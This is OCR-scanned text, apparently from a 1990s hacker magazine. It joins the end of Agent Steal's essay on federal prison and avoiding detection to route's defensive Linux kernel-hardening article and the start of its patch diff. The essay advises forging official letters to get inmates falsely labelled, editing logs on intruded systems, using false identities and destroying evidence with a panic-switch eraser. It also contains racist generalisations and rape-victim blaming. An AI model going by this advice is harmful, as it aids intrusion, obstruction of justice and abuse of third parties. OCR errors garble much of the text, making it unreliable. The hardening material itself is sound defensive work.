
Moving up again we get to medium and high FCI’s which are often 
combined. More razor wire, more guards, restricted movement and a rougher 
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crowd. It’s also common to find people with 20 or 30+ year sentences. 

Fighting is much more common. Keep to yourself, however, and people generally 
leave you alone. Killings are not too terribly common. With a prison 
population of 1500-2000, about one or two a year leave on a stretcher and don’t 
come back. 


The United States Penitentiary (U.S.P.) is where you find the murderers, 
rapists, spies and the roughest gang bangers. "Leavenworth" and "Atlanta" are 
the most infamous of these joints. Traditionally surrounded by a 40 foot 
brick wall, they take on an ominous appearance. The murder rate per prison 


averages about 30 per year with well over 250 stabbings. 


[The highest security level in the system is Max, sometimes referred to 
as "Supermax." Max custody inmates are locked down all the time. Your mail is 
shown to you over a TV screen in your cell. The shower is on wheels and it 
comes to your door. You rarely see other humans and if you do leave your cell 
you will be handcuffed and have at least a three guard escort. Mr. Gotti, the 
Mafia boss, remains in Supermax. So does Aldridge Ames, the spy. 


C. GETTING DESIGNATED 


Once you are sentenced, the BOP has to figure out what they want to do 
with you. There is a manual called the "Custody and Classification Manual" 
that they are supposed to follow. It is publicly available through the 
Freedom of Information Act and it is also in most prison law libraries. 
Unfortunately, it can be interpreted a number of different ways. As a result, 
most prison officials responsible for classifying you do pretty much as they 
please. 


Your first classification is done by the Region Designator at BOP 
Regional Headquarters. As a computer hacker you will most likely be placed in 
a camp or a low FCI. This is assuming you weren’t pulling bank jobs on the 
side. -IF- you do wind up in an FCI, you should make it to a camp after six 
months. This is assuming you behave yourself. 


Another thing the Region Designator will do is to place a "Computer 
No" on your file. This means you will not be allowed to operate a computer at 
your prison work assignment. In my case I wasn’t allowed to be within 10 feet 
of one. It was explained to me that they didn’t even want me to know the 
types of software they were running. Incidentally, the BOP uses PC/Server 
based LANs with NetWare 4.1 running on Fiber 10baseT Ethernet connections to 
Cabletron switches and hubs. PC based gateways reside at every prison. The 
connection to the IBM mainframe (Sentry) is done through leased lines via 
Sprintnet’s Frame Relay service with 3270 emulation software/hardware resident 
on the local servers. Sentry resides in Washington, D.C. with SNA type 
network concentrators at the regional offices. ;-) And I picked all of this up 
without even trying to. Needless to say, BOP computer security is very lax. 
Many of their publicly available "Program Statements" contain specific 
information on how to use Sentry and what it’s designed to do. They have other 
networks as well, but this is not a tutorial on how to hack the BOP. I’11 save 
that for if they ever really piss me off. (humor) 


Not surprisingly, the BOP is very paranoid about computer hackers. I 
went out of my way not to be interested in their systems or to receive 
computer security related mail. Nevertheless, they tried restricting my mail 
on numerous occasions. After I filed numerous grievances and had a meeting 
with the warden, they decided I was probably going to behave myself. My 20 or 
so magazine subscriptions were permitted to come in, after a special screening. 
Despite all of that I still had occasional problems, usually when I received 
something esoteric in nature. It’s my understanding, however, that many 
hackers at other prisons have not been as fortunate as I was. 


D. IGNORANT INMATES 


You will meet some of the stupidest people on the planet in prison. I 
suppose that is why they are there, too dumb to do anything except crime. And 
for some strange reason these uneducated low class common thieves think they 
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deserve your respect. In fact they will often demand it. These are the sam 
people that condemn everyone who cooperated, while at the same time feel it is 
fine to break into your house or rob a store at gunpoint. These are the types 
of inmates you will be incarcerated with, and occasionally these inmates will 
try to get over on you. They will do this for no reason other than the fact 
you are an easy mark. 


There are a few tricks hackers can do to protect themselves in prison. 
The key to your success is acting before the problem escalates. It is also 
important to have someone outside (preferably another hacker) that can do some 
social engineering for you. The objective is simply to have your problem 
inmate moved to another institution. I don’t want to give away my methods but 
if staff believes that an inmate is going to cause trouble, or if they believe 
his life is in danger, they will move him or lock him away in segregation. 
Social engineered letters (official looking) or phone calls from the right 
source to the right department will often evoke brisk action. It’s also quite 
simple to make an inmates life quite miserable. If the BOP has reason to 
believe that an inmate is an escape risk, a suicide threat, or had pending 
charges, they will handle them much differently. Tacking these labels on an 


inmate would be a real nasty trick. I have a saying: "Hackers usually have 
the last word in arguments." Indeed. 
Chances are you won’t have many troubles in prison. This especially 


applies if you go to a camp, mind your own business, and watch your mouth. 
Nevertheless, I’ve covered all of this in the event you find yourself caught 


up in the ignorant behavior of inmates whose lives revolve around prison. And 
one last piece of advice, don’t make threats, truly stupid people are too 
stupid to fear anything, particularly an intelligent man. Just do it. 


E. POPULATION 


The distribution of blacks, whites and Hispanics varies from 
institution to institution. Overall it works out to roughly 30% white, 30% 


Hispanic and 30% black. The remaining 10% are various other races. Some 
joints have a high percent of blacks and vice versa. I’m not necessarily a 


prejudiced person, but prisons where blacks are in majority are a nightmare. 
Acting loud, disrespectful, and trying to run the place is par for the course. 


In terms of crimes, 60% of the Federal inmate population are 


incarcerated for drug related crimes. The next most common would be bank 
robbery (usually for quick drug money), then various white collar crimes. The 
Federal prison population has changed over the years. It used to be a place 


for the criminal elite. The tough drug laws have changed all of that. 


Just to quell the rumors, I’m going to cover the topic of prison rape. 
Quite simply, in medium and low security level Federal prisons it is unheard 


of. In the highs it rarely happens. When it does happen, one could argue 
that the victim was asking for it. I heard an inmate say once, "You can’t 
make no inmate suck cock that don’t wanta." Indeed. In my 41 months of 
incarceration, I never felt in any danger. I would occasionally have inmates 


that would subtly ask me questions to see where my preferences lie, but once I 
made it clear that I didn’t swing that way I would be left alone. Hell, I got 
hit on more often when I was hanging out in Hollywood! 


On the other hand, state prisons can be a hostile environment for rape 
and fighting in general. Many of us heard how Bernie S. got beat up over use 
of the phone. Indeed, I had to get busy a couple of times. Most prison 
arguments occur over three simple things: the phone, the TV and money/drugs. 
If you want to stay out of trouble in a state prison, or Federal for that 
matter, don’t use the phone too long, don’t change the channel and don’t get 
involved in gambling or drugs. As far as rape goes, pick your friends 
carefully and stick with them. And always, always, be respectful. Even if 
the guy is a fucking idiot (and most inmates are), say excuse me. 


My final piece of prison etiquette advice would be to never take your 
inmate problems to "the man" (prison staff). Despite the fact that most 
everyone in prison snitched on their co-defendants at trial, there is no 
excuse for being a prison rat. The rules are set by the prisoners themselves. 
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If someone steps out of line there will likely be another inmate who will be 
happy to knock him back. In some prisons inmates are so afraid of being 
labeled a rat that they refuse to be seen talking alone with a prison staff 
member. I should close this paragraph by stating that this bit of etiquette 
is routinely ignored as other inmates will snitch on you for any reason 
whatsoever. Prison is a strange environment. 


F. DOING TIME 


You can make what you want to out of prison. Some people sit around 
and do dope all day. Others immerse themselves in a routine of work and 
exercise. I studied technology and music. Regardless, prisons are no longer 
a place of rehabilitation. They serve only to punish and conditions are only 
going to worsen. The effect is that angry, uneducated, and unproductive 
inmates are being released back into society. 


While I was incarcerated in 95/96, the prison band program was still 
in operation. I played drums for two different prison bands. It really helped 
pass the time and when I get out I will continue with my career in music. Now 
the program has been canceled, all because some senator wanted to be seen as 
being tough on crime. Bills were passed in Congress. The cable TV is gone, 
pornography mags are no longer permitted, and the weight piles are being 
removed. All this means is that prisoners will have more spare time on their 
hands, and so more guards will have to be hired to watch the prisoners. I 
don’t want to get started on this subject. Essentially what I’m saying is 
make something out of your time. Study, get in to a routine and before you 
know you’ll be going home, and a better person on top of it. 


G. DISCIPLINARY ACTIONS 


What fun is it if you go to prison and don’t get into some mischief? 


Well, I’m happy to say the only "shots" (violations) I ever received were for 
having a friend place a call with his three-way calling for me (you can’t call 
veryone collect), and drinking homemade wine. |-) The prison occasionally 


monitors your phone calls and on the seven or eight hundredth time I made a 
three-way I got caught. My punishment was ten hours of extra duty (cleaning 
up). Other punishments for shots include loss of phone use, loss of 
commissary, loss of visits, and getting thrown in the hole. Shots can also 
increase your security level and can get you transferred to a higher level 
institution. If you find yourself having trouble in this area you may want to 
pick up the book, "How to win prison disciplinary hearings", by Alan Parmelee, 
206-328-2875. 


H. ADMINISTRATIVE REMEDY 


If you have a disagreement with the way staff is handling your case 


(and you will) or another complaint, there is an administrative remedy 
procedure. First you must try to resolve it informally. Then you can file a 
form BP-9. The BP-9 goes to the warden. After that you can file a BP-10 


which goes to the region. Finally, a BP-11 goes to the National BOP 
Headquarters (Central Office). The whole procedure is a joke and takes about 
six months to complete. Delay and conquer is the BOP motto. After you 
complete the remedy process to no avail, you may file your action in a civil 
court. In som xtreme cases you may take your case directly to the courts 
without exhausting the remedy process. Again, the "Prisoners Self-Help 
Litigation Manual" covers this quite well. 


My best advice with this remedy nonsense is to keep your request brief, 
clear, concise and only ask for one specific thing per form. Usually if you 
"got it coming" you will get it. If you don’t, or if the BOP can find any 
reason to deny your request, they will. 


For this reason I often took my problems outside the prison from the 
start. If it was a substantial enough issue I would inform the media, the 
director of the BOP, all three of my attorneys, my judge and the ACLU. Often 
this worked. It always pissed them off. But, alas I’m a man of principle and 
if you deprive me of my rights I’m going to raise hell. In the past I might 
have resorted to hacker tactics, like disrupting the BOP’s entire 
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communication system bringing it crashing down! But...I’m rehabilitated now. 
Incidentally, most BOP officials and inmates have no concept of the kind of 
havoc a hacker can wield on an individuals life. So until some hacker shows 
the BOP which end is up you will have to accept the fact most everyone you 
meet in prison will have only nominal respect for you. Deal with it, you’re 
not in cyberspace anymore. 


I. PRISON OFFICIALS 


There are two types, dumb and dumber. I’ve had respect for several 
but I’ve never met one that impressed me as being particularly talented ina 
way other than following orders. Typically you will find staff that are 
either just doing their job, or staff that is determined to advance their 
career. The latter take their jobs and themselves way too seriously. They 
don’t get anywhere by being nice to inmates so they are often quite curt. 
Ex-military and law enforcement wannabes are commonplace. All in all they’re 
a pain in the ass but easy to deal with. Anyone who has ever been down 
(incarcerated) for awhile knows it’s best to keep a low profile. If they don’t 
know you by name you’re in good shape. 


One of the problems that computer hackers will encounter with prison 
staff is fear and/or resentment. If you are a pretentious articulate educated 
white boy like myself you would be wise to act a little stupid. These people 


don’t want to respect you and some of them will hate everything that you stand 
for. Many dislike all inmates to begin with. And the concept of you someday 
having a great job and being successful bothers them. It’s all a rather 
bizarre environment wher veryone seems to hate their jobs. I guess I’ve led 
a sheltered life. 


Before I move on, sometimes there will be certain staff members, like 
your Case Manager, that will have a substantial amount of control over your 
situation. The best way to deal with the person is to stay out of their way. 
Be polite, don’t file grievances against them and hope that they will take 
care of you when it comes time. If this doesn’t seem to work, then you need 
to be a total pain in the ass and ride them with every possible request you 
can muster. It’s especially helpful if you have outside people willing to 
make calls. Strong media attention will usually, at the very least, make the 
prison do what they are supposed to do. If you have received a lot of bad 
press, this could be a disadvantage. If your care continues to be a problem, 
the prison will transfer you to another facility where you are more likely to 
get a break. All in all how you choose to deal with staff is often a 
difficult decision. My advice is that unless you are really getting screwed 
over or really hate the prison you are in, don’t rock the boat. 


J. THE HOLE 


Segregation sucks, but chances are you will find yourself there at 
some point and usually for the most ridiculous of reasons. Sometimes you will 
wind up there because of what someone else did. The hole is a 6’ x 10’ 
concrete room with a steel bed and steel toilet. Your privileges will vary, 
but at first you get nothing but a shower every couple of days. Naturally they 
feed you but, it’s never enough, and it’s often cold. With no snacks you 
often find yourself quite hungry in-between meals. There is nothing to do 
ther xcept read and hopefully some guard has been kind enough to throw you 
some old novel. 


Disciplinary actions will land you in the hole for typically a week or 
two. In some cases you might get stuck there for a month or three. It depends 
on the shot and on the Lieutenant that sent you there. Sometimes people never 
leave the hol 


K. GOOD TIME 


You get 54 days per year off of your sentence for good behavior. If 
anyone tells you that a bill is going to be passed to give 108 days, they are 
lying. 54 days a year works out to 15% and you have to do something 


significant to justify getting that taken away. The BOP has come up with the 
most complicated and ridiculous way to calculate how much good time you have 
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earned. They have a book about three inches thick that discusses how to 
calculate your exact release date. I studied the book intensely and came to 
the conclusion that the only purpose it serves is to covertly steal a few days 
of good time from you. Go figure. 


L. HALFWAY HOUS 


Gl 


All "eligible" inmates are to serve the last 10% of their sentence 
(not to exceed six months) in a Community Corrections Center (CCC). At the CCC 
, which is nothing more than a large house in a bad part of town, you are to 
find a job in the community and spend your evenings and nights at the CCC. You 
have to give 25% of the gross amount of your check to the CCC to pay for all of 
your expenses, unless you are a rare Federal prisoner sentenced to serve all of 
your time at the CCC in which case it is 10%. They will breathalyse and 
urinanalyse you routinely to make sure you are not having too much fun. If 
you’re a good little hacker you’1ll get a weekend pass so you can stay out all 
night. Most CCCs will transfer you to home confinement status after a few 
weeks. This means you can move into your own place, (if they approve it) but 
still have to be in for the evenings. They check up on you by phone. And no, 
you are not allowed call forwarding, silly rabbit. 


M. SUPERVISED RELEASE 


Just when you think the fun is all over, after you are released from 
prison or the CCC, you will be required to report to a Probation Officer. For 
the next 3 to 5 years you will be on Supervised Release. The government 
abolished parole, thereby preventing convicts from getting out of prison early. 
Despite this they still want to keep tabs on you for awhile. 


Supervised Release, in my opinion, is nothing more than extended 
punishment. You are a not a free man able to travel and work as you please. 
All of your activities will have to be presented to your Probation Officer 
(P.O.). And probation is essentially what Supervised Release is. Your P.O. 
can violate you for any technical violations and send you back to prison for 
several months, or over a year. If you have ANY history of drug use you will 
be required to submit to random (weekly) urinalyses. If you come up dirty it’s 
back to the joint. 


As a hacker you may find that your access to work with, or possession 
of computer equipment may be restricted. While this may sound pragmatic to 
the public, in practice it serves no other purpose that to punish and limit a 
former hacker’s ability to support himself. With computers at libraries, copy 
shops, schools, and virtually everywhere, it’s much like restricting someone 
who used a car to get to and from a bank robbery to not ever drive again. Ifa 
hacker is predisposed to hacking he’s going to be able to do it with or 
without restrictions. In reality many hackers don’t even need a computer to 
achieve their goals. As you probably know a phone and a little social 
engineering go a long way. 


But with any luck you will be assigned a reasonable P.O. and you will 
stay out of trouble. If you give your P.O. no cause to keep an eye on you, 
you may find the reins loosening up. You may also be able to have your 
Supervised Release terminated early by the court. After a year or so, with 
good cause, and all of your government debts paid, it might be plausible. Hire 
an attorney, file a motion. 


For many convicts Supervised Release is simply too much like being in 
prison. For those it is best to violate, go back to prison for a few months, 
and hope the judge terminates their Supervised Release. Although the judge 
may continue your supervision, he/she typically will not. 


PART III 


A. HOW TO AVOID DE 


Wy 


ECTION 


Now that you know what kind of trouble you are facing I’1ll go back to 


5.txt Wed Apr 26 09:43:42 2017 16 


the beginning. If what I’ve just covered doesn’t make you want to stop 
hacking then you had better learn how to protect yourself. Many hackers feel 
they have some god given constitutional right to hack. Many don’t believe it 
should be illegal. Well, neurosis and personality disorders work in strange 
ways. Regardless, I’1ll cover the topic of stealth. Please note that I in no 
way advocate or encourage hacking. This technical information is being 
provided for educational purposes only. And as I mentioned you may feel you 
have a perfectly legitimate reason for avoiding detection, simply trying to 
stay clear of other hackers would be an acceptable reason. This paper (I’m 
sure) will also serve to educate law enforcement officials on the methods 
currently being deployed by hackers to avoid detection. 


Avoiding being identified while hacking is in actually a rather simple 
feat, assuming you follow a few simple rules. Unfortunately, very few 
people bother with them, due typically to arrogance and ego. Which as I have 
noticed, seems to be a trait that is a prerequisite to being a successful 
hacker. I’ve never met a hacker who didn’t think he was the shit. And when 
it gets right down to it that was the reason that Mitnick got caught. I’1l 
examine this incident a little later. 


So I will list here a few of the basic rules I used, and then I’11 
expound upon them a little later. 


* Most important of all, I would never tell another hacker who I was, 
where I lived, or give out my home phone number. (OK, I screwed up 
on that one.) 


* I didn’t set up network access accounts up in my real name or use 
my real address. 


* I didn’t set up phone numbers in my real name. 


* IT would never dial directly in to anything I was hacking. 


* I would set up some kind of notification system that would let me 
know if someone was trying to figure out where I was connecting from. 


* I didn’t transmit personal data on systems I had have hacked into. 


* When I used a network or computer for work or social objectives, I 
tried to keep it separate from my hacking. 


* IT never assumed that just by connecting through a bunch of different 
networks or using cellular phones that I was safe. Even though most 
cellular networks do not have triangulation equipment installed they 
still have the ability to narrow a transmitting location down to a 
square mile of even a few blocks, this even well after you have dis- 
connected. 


* The minute I got into a system I would examine and edit all of the 
logs. I would also look for email daemons on admin or admin assoc-— 
jated accts. that sent out copies of the system security logs. 


* When setting up accts. on systems I would use different login ID’s. 
* I never went to hacker cons. (Until I worked with the FBI) 
* IT would change network access dial up accts. and dial up numbers 


every so often. I would also change living locations every 8-12 
months. 


* T would keep in mind that the numbers I dialed on my phone could 
eventually be used to track me again. For example, if I called my 
girl friend frequently, after I changed numbers and location I might 
still be calling that number. The telcos now have toll record data 
base software that can cross reference and track this type of thing. 


* T rarely used IRC until I worked with the FBI. If -you- must, change 
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It’s obviously a bit complex, but you get the idea. My point being that 
avoiding detection is not a simple task. If someone wants you they can get 
you. There really isn’t such a thing as a secure connection; virtually 
everything can be traced, short of a highly directional data burst satellite 
uplink. At that point the Air Force National Reconnaissance Office (NRO) or 
the NSA would have to get involved, big bucks. 


Aside from setting up physical hardware another idea would be to find 
a Sysadmin that will let you use his system to connect through. If you trust 
him to tell you if there has been an inquiry regarding your connection then 
you might be OK. It would also be wise to set up background processes that 
monitor finger and other related probes of your account. Watch them watch you. 


As I mentioned earlier if you fall under surveillance there will be 


= 


2-way radio traffic in your vicinity. Using the Opto-Electronics Explorer 


will detect this and you can further investigate to see who it may be. Good 
physical surveillance is difficult to detect. Bad physical surveillance is 
comical. 


C. MORE PROTECTION 


I covered encryption earlier and as I mentioned it really is not safe 
to assume that it will protect you from someone who takes possession of your 
computer. The only truly safe encryption would be a military spec. 
hardware/software implementation. When people talk about secure encryption 
they are not taking into account that all the power of a Government might be 
trying to crack it, and that they will have physical access to the encryption 
device, your computer! This leaves us with one other method, destroying the 
data. Now this in and of it’s self can be construed as obstruction of 
justice. However, should you feel the need to instantly destroy all of the 
data on your hard drive, for oh.. lets say educational purposes. I would 
suggest mounting a bulk magnetic tape eraser next to your hard drive. You can 
pick one up at Radio Hack, err Shack. One flip of the panic switch, thus 
powering up the eraser while the drive is turning, and ZAP! Mount a switch 
next to your bed. ;-) 


This may or may not destroy all of the data on your drive. If the 
drive disk is removed and placed on a special reader some data may still be 
recovered. This is a science in itself. DOD spec. requires that a hard drive 
be written to with O’s 7 times before it is considered erased. Simply erasing 
a file, formatting, or defragging will not suffice. Look for a shareware 
utility named "BCwipe". This will erase to military spec. You may also want 
to install some type of program that auto erases under certain conditions. 
Regardless, computer specialists that work with computer crime are trained to 
look for this. 


There are still a lot of issues that could be covered with respect to 
avoiding detection and keeping clear of hackers. In fact I could fill a book, 
and in retrospect I probably should have. But I told a lot of people I would 
write this file and make it public. Hope you found it of some assistance. 


CLOSURI 


Gl 


What a long strange trip it’s been. I have a great deal of mixed 
emotions about my whole ordeal. I can however, say that I HAVE benefited 

from my incarceration. However, it certainly was not on the behalf of how I 
was handled by the government. No, despite their efforts to kick me when I 
was down, use me, turn their backs after I had assisted them, and in general, 
just violate my rights, I was still able to emerge better educated than when I 
went in. But frankly, my release from prison was just in the nick of time. 
The long term effects of incarceration and stress were creeping up on me, and 
I could see prison conditions were worsening. It’s hard to express the 
poignancy of the situation but the majority of those incarcerated feel that if 
drastic changes are not made America is due for some serious turmoil, perhaps 
even a civil war. Yes, the criminal justice system is that screwed up. The 
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Nation’s thirst for vengeance on criminals is leading us into a vicious 
feedback loop of crime and punishment, and once again crime. Quite simply, 
the system is not working. My purpose in writing this article was not to send 
any kind of message. I’m not telling you how not to get caught and I’m not 
telling you to stop hacking. I wrote this simply because I feel like I owe it 
to whomever might get use of it. For some strange reason I am oddly compelled 
to tell you what happened to me. Perhaps this is some kind or therapy, 
perhaps it’s just my ego, perhaps I just want to help some poor 18 year old 
hacker who really doesn’t know what he is getting himself in to. Whatever the 
reason, I just sat down one day and started writing. 


If there is a central theme to this article it would be how ugly your 
world can become. Once you get grabbed by the law, sucked into their vacuum, 
and they shine the spotlight on you, there will be little you can do to 
protect yourself. The vultures and predators will try to pick what they can 
off of you. It’s open season for the U.S. Attorneys, your attorney, other 
inmates, and prison officials. You become fair game. Defending yourself from 
all of these forces will require all of your wits, all of your resources, and 
occasionally your fists. 


Furthering the humiliation, the press, as a general rule, will not be 
concerned with presenting the truth. They will print what suits them and 
often omit many relevant facts. If you have read any of the 5 books I am 
covered in you will no doubt have a rather jaded opinion of me. Let me assure 
you that if you met me today you would quickly see that I am quite likable and 
not the villain many (especially Jon Littman) have made me out to be. You may 
not agree with how I lived my life, but you wouldn’t have any trouble 
understanding why I chose to live it that way. Granted I’ve made my mistakes, 
growing up has been a long road for me. Nevertheless, I have no shortage of 
good friends. Friends that I am immensely loyal to. But if you believe 
everything you read you’d have the impression that Mitnick is a vindictive 
loser, Poulsen a furtive stalker, and I a two faced rat. All of those 
assessments would be incorrect. 


So much for first impressions. I just hope I was able to enlighten 
you and in some way to help you make the right choice. Whether it’s 
protecting yourself from what could be a traumatic life altering experience, 
or compelling you to focus your computer skills on other avenues, it’s 
important for you to know the program, the language, and the rules. 


See you in the movies. 


Agent Steal 
1997 
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[ Hardening the Linux Kernel (series 2.0.x) 


a at [ route|daemon9 <route@infonexus.com> 


----[ Introduction and Impetus 


Linux. The cutest Unix-like O/S alive today. Everyone knows at least 
xone* person who has at least *one* Linux machine. Linux, whatever your 
opinion of it, is out there, and is being used by more and more people. Many 
of the people using Linux are using it in multi-user environments. All of a 
sudden they find security to be a big issue. This article is for those people. 


This article covers a few areas of potential insecurity in the Linux O/S 
and attempts to improve upon them. It contains several security related 
kernel patches for the 2.0.x kernels (each has been tested successfully on the 
2.0.3x kernels and most should work on older 2.0.x kernels; s ach 
subsection for more info). 


These are kernel patches. They do nothing for user-land security. If you 
can not set permissions and configure services correctly, you should not be 
running a Unix machine. 


These patches are not bugfixes. They are preventative security fixes. 
They are intended to prevent possible problems and breaches of security from 
occurring. In some cases they can remove (or at least severely complicate) the 
threat of many of today’s most popular methods of attack. 


These patches are not really useful on a single-user machine. They are 
really intended for a multi-user box. 


This article is for those of you who want better security out of your Linux 
O/S. If you want to go a bit further, look into the POSIX.le (POSIX 6) stuff. 
POSIX.le is a security model that basically separates identity and privilege. 
Effectively, it splits superuser privileges into different ‘capabilities’. 
Additionally, the Linux POSIX.le (linux-privs) implementation offers a bitmapped 
securelevel, kernel-based auditing (userland audit hooks are being developed), 
and ACLs. See: http://parc.power.net/morgan/Orange-Linux/linux-privs/index.html 


To sum it up, in this article, w xplore a few ways to make the multi-user 
Linux machine a bit more secure and resilient to attack. 


----[ The Patches 


procfs patch 


Tested on: 2.0.0 + 
Author: route 


Why should we allow anyone to be able to view info on any process? 


Normally, /bin/ps can show process listing for every process in the 
kernel’s process table, regardless of ownership. A non-privileged user can 
see all the running processes on a system. This can include information that 
could be used in some forms of known / guessed PID-based attacks, not to 
mention the obvious lack of privacy. /bin/ps gets this process information by 
reading the /proc filesystem. 


The /proc filesystem is a virtual filesystem interface into the O/S which 
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provides all kinds of good information including the status of various 
portions of the running kernel and a list of currently running processes. It 
has a filesystem interface, which means it has file-system-like access 
controls. As such, we can change the default access permissions on the inode 
from 555 to 500. 


And that’s the patch. We just change the permissions on the inode from 
S_IFDIR | S_IRUGO | S_IXUGO to S_IFDIR | S_IRUSR | S_IXUSR. 


trusted path execution patch 


Tested on: 2.0.0 + 
Author: route (2.0.x version, original 1.x patch by merc) 


Why should we allow arbitrary programs execution rights? 


Consider this scenario: You are the administrator of a multi-user Linux 
machine. All of a sudden there is a new bug in the Pentium(tm) processor! 
As it happens, this bug causes the CPU to lock up entirely, requiring a cold 
reboot. This bug is also exploitable by any user regardless of privilege. All 
it necessitates is for the malevolent user to 1) get the source, 2) compile the 
exploit, and 3) execute the program. 


Whelp... 1) has happened. You cannot prevent anyone from getting it. It’s 
out there. You could remove permissions from the compiler on your machine or 
remove the binary entirely, but this does not stop the user from compiling 
the exploit elsewhere, and getting the binary on your machine somehow. You 
cannot prevent 2) either. However, if you only allow binaries to be executed 
from a trusted path, you can prevent 3) from happening. A trusted path is 
one that is inside is a root owned directory that is not group or world 
writable. /bin, /usr/bin, /usr/local/bin, are (under normal circumstances) 
considered trusted. Any non-root users home directory is not trusted, nor is 
/tmp. Be warned: This patch is a major annoyance to users who like to execute 


code and scripts from their home directories! It will make you extremely 
un-popular as far as these people are concerned. It will also let you sleep 
easier at night knowing that no unscrupulous persons will be executing 


malicious bits of code on your machine. 


Before any call to exec is allowed to run, we open the inode of the 
directory that the executable lives in and check ownership and permissions. 
If the directory is not owned by root, or is writable to group or other, we 
consider that untrusted. 


securelevel patch 


Tested on: 2.0.26 + 
Author: route 


Damnit, if I set the immutable and append only bits, I did it for a reason. 


This patch isn’t really much of a patch. It simply bumps the securelevel 
up, to 1 from 0. This freezes the immutable and append-only bits on files, 
keeping anyone from changing them (from the normal chattr interface). Befor 
turning this on, you should of course make certain key files immutable, and 
logfiles append-only. It is still possible to open the raw disk device, 
however. Your average cut and paste hacker will probably not know how to do 
this. 


stack execution disabling patch and symlink patch 


Tested on: 2.0.30 + 
Author: solar designer 


From the documentation accompanying SD’s patch: 
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This patch is intended to add protection against two classes of security 
holes: buffer overflows and symlinks in /tmp. 


Most buffer overflow exploits are based on overwriting a function’s return 
address on the stack to point to some arbitrary code, which is also put 
onto the stack. If the stack area is non-executable, buffer overflow 
vulnerabilities become harder to exploit. 


Another way to exploit a buffer overflow is to point the return address to 
a function in libc, usually system(). This patch also changes the default 
address that shared libraries are mmap()ed at to make it always contain a 
zero byte. This makes it impossible to specify any more data (parameters 
to the function, or more copies of the return address when filling with a 
pattern) in an exploit that has to do with ASCIIZ strings (this is the 
case for most overflow vulnerabilities). 


However, note that this patch is by no means a complete solution, it just 
adds an extra layer of security. Some buffer overflow vulnerabilities will 
still remain exploitable a more complicated way. The reason for using such 
a patch is to protect against some of the buffer overflow vulnerabilities 
that are yet unknown. 


In this version of my patch I also added a symlink security fix, originally 
by Andrew Tridgell. I changed it to prevent from using hard links too, by 
simply not allowing non-root users to create hard links to files they don’t 
own, in +t directories. This seems to be the desired behavior anyway, since 
otherwise users couldn’t remove such links they just created. I also added 
exploit attempt logging, this code is shared with the non-executable stack 
stuff, and was the reason to make it a single patch instead of two separate 
ones. You can enable them separately anyway. 


GID split privilege patch 


Tested on: 2.0.30 + 
Author: Original version DaveG, updated for 2.0.33 by route 


From the documentation accompanying Dave’s original patch: 
This is a simple kernel patch that allows you to perform certain 
privileged operations with out requiring root access. With this patch 
three groups become privileged groups allowed to do different operations 
within the kernel. 


GID 16 : a program running with group 16 privileges can bind to a 
< 1024. This allows programs like: rlogin, rcp, rsh, and ssh 
to run setgid 16 instead of setuid O(root). This also allows 


servers that need to run as root to bind to a privileged port 
like named, to also run setgid 16. 


GID 17 : any program running under GID 17 privileges will be able to 
create a raw socket. Programs like ping and traceroute can now 
be made to run setgid 17 instead of setuid O(root). 


GID 18 : This group is for SOCK_PACKET. This isn’t useful for most people, 
so if you don’t know what it is, don’t worry about it. 


Limitations 


Since this is a simple patch, it is VERY limited. First of all, there 

is no support for supplementary groups. This means that you can’t stack 
these privileges. If you need GID 16 and 17, there isn’t much you can do 
about it. 


----[ Installation 
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This patchfile has been tested and verified to work against the latest 
stable release of the linux kernel (as of this writing, 2.0.33). It should 
work against other 2.0.x releases as well with little or no modification. THIS 
IS NOT A GUARANTEE! Please do not send me your failed patch logs from older 
kernels. Take this as a perfect opportunity to upgrade your kernel to the 
latest release. Note that several of these patches are for X86-Linux only. 
Sorry. 


1. Create the symlink: 


‘cd /usr/src* 
‘In -s linux-KERNEL_ VERSION linux-stock * 


2. Apply the kernel patch: 


‘patch < slinux.patch >& patch.err* 


2a. Examine the error file for any failed hunks. Figure where you went wrong 
in life: 


‘grep fail patch.err* 
3. Configure your kernel: 


‘make config* OR ‘make menu-config* OR ‘make xconfig* 


4. You will need to enable prompting for experimental code in your kernel and 
turn on the patches individually. 


5. To configure the split GID privilege patch, add the follow to your 
/etc/group file: 


‘cat >> /etc/group* 
priv_port::16:userl, user2, user3 
raw_sock::17:userl, user2 
sock_pak::18:user2, user3 

“D 


Where ‘userx* are the usernames of the users you wish to give these 
permissions to. Next, fix the corresponding group and permissions on the 
binaries you wish to strip root privileges from: 


‘chgrp raw_sock /bin/ping* 
‘chmod 2755 /bin/ping* 


----[ The patchfile 


This patchfile should be extracted with the Phrack Magazine Extraction 
Utility included in this (and every) issue. 


<++> slinux.patch 
diff -ru linux-stock/Documentation/Configure.help linux-patched/Documentation/Configure.hel 


--- linux-stock/Documentation/Configure.help Fri Sep 5 20:43:58 1997 
+++ linux-patched/Documentation/Configure.help Mon Nov 10 22:02:36 1997 
@@ -720,6 +720,77 @@ 
later load the module when you install the JDK or find an interesting 
Java program that you can’t live without. 


+Non-executable user stack area (EXPERIMENTAL) 

+CONFIG_STACKEXEC 

+ Most buffer overflow exploits are based on overwriting a function’s 

+ return address on the stack to point to some arbitrary code, which is 
+ also put onto the stack. If the stack area is non-executable, buffer 
+ overflow vulnerabilities become harder to exploit. However, a few 
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t programs depend on the stack being executable, and might stop working 
t unless you also enable GCC trampolines autodetection below, or enable 
+ the stack area execution permission for every such program separately 
t using chstk.c. If you don’t know what all this is about, or don’t care 
t about security that much, say N. 


tAutodetect GCC trampolines 
tCONFIG_STACKEXEC_AUTOENABLE 
+t GCC generates trampolines on the stack to correctly pass control to 

t+ nested functions when calling from outside. This requires the stack 

+t being executable. When this option is enabled, programs containing 

t+ trampolines will automatically get their stack area executable when 

t a trampoline is found. However, in some cases this autodetection can 

+t be fooled in a buffer overflow exploit, so it is more secure to 

t disable this option and use chstk.c to enable the stack area execution 
+ permission for every such program separately. If you’re too lazy, 

t answer Y. 


tLog buffer overflow exploit attempts 

tCONFIG STACKEXEC_LOG 

+t This option enables logging of buffer overflow exploit attempts. No 
+ more than one attempt per minute is logged, so this is safe. Say Y. 


tProcess table viewing restriction (EXPERIMENTAL) 
tCONFIG_PROC_RESTRICT 
+ This option enables process table viewing restriction. Users will only 


be able to get status of processes they own, with the exception the 
t+ root user, who can get an entire process table listing. This patch 
t should not cause any problems with other programs but it is not fully 


tested under every possible contingency. You must enable the /proc 
+t filesystem for this option to be of any use. If you run a multi-user 
tf system and are reasonably concerned with privacy and/or security, say Y. 
tTrusted path execution (EXPERIMENTAL) 
tCONFIG_TPE 
t+ This option enables trusted path execution. Binaries are considered 
t «6.‘trusted* if they live in a root owned directory that is not group or 
+t world writable. If an attempt is made to execute a program from a non 
